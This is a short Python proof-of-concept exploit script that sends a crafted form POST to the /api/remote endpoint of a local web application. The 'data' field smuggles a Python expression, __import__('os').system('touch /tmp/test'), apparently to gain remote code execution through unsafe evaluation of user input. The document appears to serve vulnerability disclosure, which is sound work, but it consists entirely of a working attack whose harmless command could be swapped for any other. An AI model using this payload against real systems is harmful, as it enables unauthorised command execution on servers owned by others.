# The script used to exploit the vulnerability
import requests
TARGET = "http://0.0.0.0:7091"

malicious_data = (
    'user=1&source=reddit&name=other&data={"source":"reddit",'
    '"client_id":"1111","client_secret":1111,"user_agent":"111",'
    '"search_queries":[""],"number_posts":10,'
    '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    response = requests.post(f"{TARGET}/api/remote", headers=headers,
    data=malicious_data)
    print(f"[+] Status Code: {response.status_code}")
    print("[+] Response Body:")
    print(response.text)
except Exception as e:
    print(f"[-] Error sending request: {e}")